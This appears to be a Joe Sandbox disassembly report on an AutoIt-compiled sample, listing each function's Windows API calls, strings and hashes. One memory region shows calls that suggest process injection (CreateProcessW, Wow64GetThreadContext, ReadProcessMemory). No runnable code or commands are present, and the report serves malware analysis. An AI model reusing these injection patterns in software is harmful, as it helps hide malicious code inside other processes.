                                • Instruction ID: f4e688c78abc0dc658da65e557d9eeff82639392ce4d99552bfc3e7a61a55058
                                • Opcode Fuzzy Hash: ef6a8ca6bcc188487fb04c071e19bbd2e38322170f688dcba3d125083251df93
                                • Instruction Fuzzy Hash: 4F818076800219AACB25EBE0DD92EFF77B8EF14350F100025E542B6191EF706A45DBB1

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 00CAC6A0: __time64.LIBCMT ref: 00CAC6AA
                                  • Part of subcall function 00C641A7: _fseek.LIBCMT ref: 00C641BF
                                • __wsplitpath.LIBCMT ref: 00CAC96F
                                  • Part of subcall function 00C8297D: __wsplitpath_helper.LIBCMT ref: 00C829BD
                                • _wcscpy.LIBCMT ref: 00CAC982
                                • _wcscat.LIBCMT ref: 00CAC995
                                • __wsplitpath.LIBCMT ref: 00CAC9BA
                                • _wcscat.LIBCMT ref: 00CAC9D0
                                • _wcscat.LIBCMT ref: 00CAC9E3
                                  • Part of subcall function 00CAC6E4: _memmove.LIBCMT ref: 00CAC71D
                                  • Part of subcall function 00CAC6E4: _memmove.LIBCMT ref: 00CAC72C
                                • _wcscmp.LIBCMT ref: 00CAC92A
                                  • Part of subcall function 00CACE59: _wcscmp.LIBCMT ref: 00CACF49
                                  • Part of subcall function 00CACE59: _wcscmp.LIBCMT ref: 00CACF5C
                                • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00CACB8D
                                • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00CACC24
                                • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00CACC3A
                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00CACC4B
                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00CACC5D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                • String ID:
                                • API String ID: 152968663-0
                                • Opcode ID: efe82e101f1a78e45cc3357f053ccc12629115418b87e383a8861187855a764c
                                • Instruction ID: 035b6e06d5338e6c6f78be36c766421dee14f711d1cb5b42c34280d1729e71c3
                                • Opcode Fuzzy Hash: efe82e101f1a78e45cc3357f053ccc12629115418b87e383a8861187855a764c
                                • Instruction Fuzzy Hash: 76C12CB190012DAEDF14DFA5CC81EEEBBBDAF49314F0040AAF609E6151DB709A84DF65

                                Control-flow Graph

                                APIs
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00C7EA39
                                • __wsplitpath.LIBCMT ref: 00C7EA56
                                  • Part of subcall function 00C8297D: __wsplitpath_helper.LIBCMT ref: 00C829BD
                                • _wcsncat.LIBCMT ref: 00C7EA69
                                • __makepath.LIBCMT ref: 00C7EA85
                                  • Part of subcall function 00C82BFF: __wmakepath_s.LIBCMT ref: 00C82C13
                                  • Part of subcall function 00C8010A: std::exception::exception.LIBCMT ref: 00C8013E
                                  • Part of subcall function 00C8010A: __CxxThrowException@8.LIBCMT ref: 00C80153
                                • _wcscpy.LIBCMT ref: 00C7EABE
                                  • Part of subcall function 00C7EB05: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,00C7EADA,?,?), ref: 00C7EB27
                                • _wcscat.LIBCMT ref: 00CD32FC
                                • _wcscat.LIBCMT ref: 00CD3334
                                • _wcsncpy.LIBCMT ref: 00CD3370
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
                                • String ID: Include$\
                                • API String ID: 1213536620-3429789819
                                • Opcode ID: 05816562f0bb3b23a2febe76a585fb96feb2084a08723eb7f692c18c3b34d949
                                • Instruction ID: 3f455b9322d8795d1115374aeeb0bbbe56342b9b37a9f698a1a7d2257d45ae01
                                • Opcode Fuzzy Hash: 05816562f0bb3b23a2febe76a585fb96feb2084a08723eb7f692c18c3b34d949
                                • Instruction Fuzzy Hash: BA516DB1404340ABC325EF55EC858AAB7F8FB69310B40452EF545C3361EB749A46DB7A

                                Control-flow Graph

                                APIs
                                • DefWindowProcW.USER32(?,?,?,?), ref: 00C62A33
                                • KillTimer.USER32(?,00000001), ref: 00C62A5D
                                • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00C62A80
                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C62A8B
                                • CreatePopupMenu.USER32 ref: 00C62A9F
                                • PostQuitMessage.USER32(00000000), ref: 00C62AAE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                • String ID: TaskbarCreated
                                • API String ID: 129472671-2362178303
                                • Opcode ID: 6b47068a6d824b01c8680729d9be0b9f95438062a4a562e2eb58a717c1ad44d7
                                • Instruction ID: 1278aca388255246c86767d8a6cbd57167407831e98f8aacee31c372362e6622
                                • Opcode Fuzzy Hash: 6b47068a6d824b01c8680729d9be0b9f95438062a4a562e2eb58a717c1ad44d7
                                • Instruction Fuzzy Hash: 2E418D34114A86ABDB34AFA4ACC9B7D3759F734300F044215F512D62A2DAB08E40B771

                                Control-flow Graph

                                APIs
                                • GetSysColorBrush.USER32(0000000F), ref: 00C630B0
                                • LoadCursorW.USER32(00000000,00007F00), ref: 00C630BF
                                • LoadIconW.USER32(00000063), ref: 00C630D5
                                • LoadIconW.USER32(000000A4), ref: 00C630E7
                                • LoadIconW.USER32(000000A2), ref: 00C630F9
                                  • Part of subcall function 00C6318A: LoadImageW.USER32(00C60000,00000063,00000001,00000010,00000010,00000000), ref: 00C631AE
                                • RegisterClassExW.USER32(?), ref: 00C63167
                                  • Part of subcall function 00C62F58: GetSysColorBrush.USER32(0000000F), ref: 00C62F8B
                                  • Part of subcall function 00C62F58: RegisterClassExW.USER32(00000030), ref: 00C62FB5
                                  • Part of subcall function 00C62F58: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C62FC6
                                  • Part of subcall function 00C62F58: InitCommonControlsEx.COMCTL32(?), ref: 00C62FE3
                                  • Part of subcall function 00C62F58: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C62FF3
                                  • Part of subcall function 00C62F58: LoadIconW.USER32(000000A9), ref: 00C63009
                                  • Part of subcall function 00C62F58: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C63018
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                • String ID: #$0$AutoIt v3
                                • API String ID: 423443420-4155596026
                                • Opcode ID: 2a167a7fa72c8f0b0b761ba0c3f1a136b41d213defbd904e3c864b0ad277d236
                                • Instruction ID: 7aef6020512fb53d5f0762d92f4ca66f09fed07a8a899b7d1821bbc51feba663
                                • Opcode Fuzzy Hash: 2a167a7fa72c8f0b0b761ba0c3f1a136b41d213defbd904e3c864b0ad277d236
                                • Instruction Fuzzy Hash: 88215EB4D00344ABCB21DFA9EC49B9DBBF5EB68310F00812AE614E63A0D37546518FA5

                                Control-flow Graph

                                APIs
                                • CreateFileW.KERNEL32(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 033926B1
                                • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 033928D7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366580328.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_3390000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CreateFileFreeVirtual
                                • String ID:
                                • API String ID: 204039940-0
                                • Opcode ID: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                • Instruction ID: 6718cfbe76ca848e5dbd8ac3872ffce9e69e824f1f6d72382423dccda7b99312
                                • Opcode Fuzzy Hash: 014c9b5c74d83c0a726ef6016946af978a068631e2f3efa1e9065a42f07dad7c
                                • Instruction Fuzzy Hash: D6A10674E04209EBEF14CFA4C894BEEB7B5BF48305F24859AE511BB280D7759A81CF94

                                Control-flow Graph

                                APIs
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00C7EA39
                                • __wsplitpath.LIBCMT ref: 00C7EA56
                                  • Part of subcall function 00C8297D: __wsplitpath_helper.LIBCMT ref: 00C829BD
                                • _wcsncat.LIBCMT ref: 00C7EA69
                                • __makepath.LIBCMT ref: 00C7EA85
                                  • Part of subcall function 00C82BFF: __wmakepath_s.LIBCMT ref: 00C82C13
                                  • Part of subcall function 00C8010A: std::exception::exception.LIBCMT ref: 00C8013E
                                  • Part of subcall function 00C8010A: __CxxThrowException@8.LIBCMT ref: 00C80153
                                • _wcscpy.LIBCMT ref: 00C7EABE
                                  • Part of subcall function 00C7EB05: RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,00C7EADA,?,?), ref: 00C7EB27
                                • _wcscat.LIBCMT ref: 00CD32FC
                                • _wcscat.LIBCMT ref: 00CD3334
                                • _wcsncpy.LIBCMT ref: 00CD3370
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: _wcscat$Exception@8FileModuleNameOpenThrow__makepath__wmakepath_s__wsplitpath__wsplitpath_helper_wcscpy_wcsncat_wcsncpystd::exception::exception
                                • String ID: Include
                                • API String ID: 1213536620-3205518615
                                • Opcode ID: 77a02fbee1f3c5dc12d0e72a60dfd46da9a73cabbaecc20c4fbab1e1cf38a52d
                                • Instruction ID: 9ea67360c83e0035a65e96cc32f55ae87bd0fed08671d5e94a9871c3fd5469ef
                                • Opcode Fuzzy Hash: 77a02fbee1f3c5dc12d0e72a60dfd46da9a73cabbaecc20c4fbab1e1cf38a52d
                                • Instruction Fuzzy Hash: C931FCB2404304ABC325EF55EC85DAA77FCF769314B800A2EF545C2361DB749A09DB75

                                Control-flow Graph

                                APIs
                                • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,00C7EADA,?,?), ref: 00C7EB27
                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,00C7EADA,?,?), ref: 00CD4B26
                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,00C7EADA,?,?), ref: 00CD4B65
                                • RegCloseKey.ADVAPI32(?,?,00C7EADA,?,?), ref: 00CD4B94
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: QueryValue$CloseOpen
                                • String ID: Include$Software\AutoIt v3\AutoIt
                                • API String ID: 1586453840-614718249
                                • Opcode ID: 707387f4877b8241e330e0d74694db8ba0a9579e9caafc3b9cb537b3250dab08
                                • Instruction ID: 11cea25cbc8760932ec88722b9839f0a89db7629f4d357674a77a265da4fe800
                                • Opcode Fuzzy Hash: 707387f4877b8241e330e0d74694db8ba0a9579e9caafc3b9cb537b3250dab08
                                • Instruction Fuzzy Hash: 1B114C71600108BFEB14EBA4CD86EFE77BCEF04354F10046AB607E6191EA719E05EB50

                                Control-flow Graph

                                APIs
                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00C62ECB
                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C62EEC
                                • ShowWindow.USER32(00000000), ref: 00C62F00
                                • ShowWindow.USER32(00000000), ref: 00C62F09
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Window$CreateShow
                                • String ID: AutoIt v3$edit
                                • API String ID: 1584632944-3779509399
                                • Opcode ID: dc54fc92db0a00fa36277a2b7798ab77c702a8f21d45d92c76f83bbc0864340a
                                • Instruction ID: 2a869791a2c3ee9d8501f50d854a51976a08ba1c27e6141dbb2739069fd999f0
                                • Opcode Fuzzy Hash: dc54fc92db0a00fa36277a2b7798ab77c702a8f21d45d92c76f83bbc0864340a
                                • Instruction Fuzzy Hash: DBF030745403D47AD73057536D48F773E7EE7E6F50B01802EBA05D6260C1610882DA75
                                APIs
                                  • Part of subcall function 033922A0: Sleep.KERNEL32(000001F4), ref: 033922B1
                                • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 033924D7
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366580328.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_3390000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CreateFileSleep
                                • String ID: E14PKPAU6XUUH34EOWXSTU
                                • API String ID: 2694422964-1101135582
                                • Opcode ID: cb6d3909dd7b49935a17262c909cb094619075df6dd4731b8c357463f613c89a
                                • Instruction ID: 1ba71473298b02e1318f6e839811ff04cb942eee7607eac727a56f93a49bb8b7
                                • Opcode Fuzzy Hash: cb6d3909dd7b49935a17262c909cb094619075df6dd4731b8c357463f613c89a
                                • Instruction Fuzzy Hash: CD518130D0464DEBEF11DBA4C858BEFBB78AF19305F044599E608BB2C1D6791B44CBA5
                                APIs
                                • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00CD454E
                                  • Part of subcall function 00C67E53: _memmove.LIBCMT ref: 00C67EB9
                                • _memset.LIBCMT ref: 00C63965
                                • _wcscpy.LIBCMT ref: 00C639B5
                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00C639C6
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                • String ID: Line:
                                • API String ID: 3942752672-1585850449
                                • Opcode ID: 5946198ac3d295ebeaeb5612d7f6a8a1931a566742dcd626e79ccd9864196fd8
                                • Instruction ID: e77773b317f8a5cf7a166a8cf4aa275f36f82d3f52be64d49d7e08b6f0032e0b
                                • Opcode Fuzzy Hash: 5946198ac3d295ebeaeb5612d7f6a8a1931a566742dcd626e79ccd9864196fd8
                                • Instruction Fuzzy Hash: F031D671008380ABD731EB60DC85FDF77E8AF69314F00491EF699921A1DB709B49DBA6
                                APIs
                                  • Part of subcall function 00C63F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00C634E2,?,00000001), ref: 00C63FCD
                                • _free.LIBCMT ref: 00CD3C27
                                • _free.LIBCMT ref: 00CD3C6E
                                  • Part of subcall function 00C6BDF0: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,00D222E8,?,00000000,?,00C63E2E,?,00000000,?,00CFDBF0,00000000,?), ref: 00C6BE8B
                                  • Part of subcall function 00C6BDF0: GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00C63E2E,?,00000000,?,00CFDBF0,00000000,?,00000002), ref: 00C6BEA7
                                  • Part of subcall function 00C6BDF0: __wsplitpath.LIBCMT ref: 00C6BF19
                                  • Part of subcall function 00C6BDF0: _wcscpy.LIBCMT ref: 00C6BF31
                                  • Part of subcall function 00C6BDF0: _wcscat.LIBCMT ref: 00C6BF46
                                  • Part of subcall function 00C6BDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 00C6BF56
                                 Memory Dump Source
                                 • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
                                • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                • API String ID: 1510338132-1757145024
                                APIs
                                • __getstream.LIBCMT ref: 00C8418E
                                  • Part of subcall function 00C8889E: __getptd_noexit.LIBCMT ref: 00C8889E
                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 00C841C9
                                • __wopenfile.LIBCMT ref: 00C841D9
                                 Memory Dump Source
                                 • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                • String ID: <G
                                • API String ID: 1820251861-2138716496
                                APIs
                                • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00C7C948,SwapMouseButtons,00000004,?), ref: 00C7C979
                                • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,00C7C948,SwapMouseButtons,00000004,?,?,?,?,00C7BF22), ref: 00C7C99A
                                • RegCloseKey.KERNEL32(00000000,?,?,00C7C948,SwapMouseButtons,00000004,?,?,?,?,00C7BF22), ref: 00C7C9BC
                                 Memory Dump Source
                                 • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: CloseOpenQueryValue
                                • String ID: Control Panel\Mouse
                                • API String ID: 3677997916-824357125
                                APIs
                                • CreateProcessW.KERNEL32(?,00000000), ref: 03391A5B
                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03391AF1
                                • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 03391B13
                                Memory Dump Source
                                • Source File: 00000000.00000002.1366580328.0000000003390000.00000040.00001000.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_3390000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                • String ID:
                                • API String ID: 2438371351-0
                                APIs
                                  • Part of subcall function 00C616F2: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00C614EB), ref: 00C61751
                                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00C6159B
                                • CoInitialize.OLE32(00000000), ref: 00C61612
                                • CloseHandle.KERNEL32(00000000), ref: 00CD58F7
                                 Memory Dump Source
                                 • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: Handle$CloseInitializeMessageRegisterWindow
                                • String ID: `T
                                • API String ID: 3815369404-1867313790
                                APIs
                                • _memset.LIBCMT ref: 00CD3CF1
                                • GetOpenFileNameW.COMDLG32(?,?,00000001,00D222E8), ref: 00CD3D35
                                  • Part of subcall function 00C631B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00C631DA
                                  • Part of subcall function 00C63A67: SHGetMalloc.SHELL32(00C63C31), ref: 00C63A7D
                                  • Part of subcall function 00C63A67: SHGetDesktopFolder.SHELL32(?), ref: 00C63A8F
                                  • Part of subcall function 00C63A67: SHGetPathFromIDListW.SHELL32(?,?), ref: 00C63AD2
                                  • Part of subcall function 00C63B45: GetFullPathNameW.KERNEL32(?,00000104,?,?,00D222E8,?), ref: 00C63B65
                                 Memory Dump Source
                                 • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366263944.0000000000D24000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c60000_3T-ENQ-O-2024-10856.jbxd
                                Similarity
                                • API ID: NamePath$Full$DesktopFileFolderFromListMallocOpen_memset
                                • String ID: X
                                • API String ID: 3714316930-3081909835
                                APIs
                                • GetTempPathW.KERNEL32(00000104,?), ref: 00CAD01E
                                • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 00CAD035
                                 Memory Dump Source
                                 • Source File: 00000000.00000002.1366168396.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                 • Associated: 00000000.00000002.1366154772.0000000000C60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000CED000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366214595.0000000000D0E000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1366250034.0000000000D1A000.00000004.00000001.01000000.00000003.sdmp
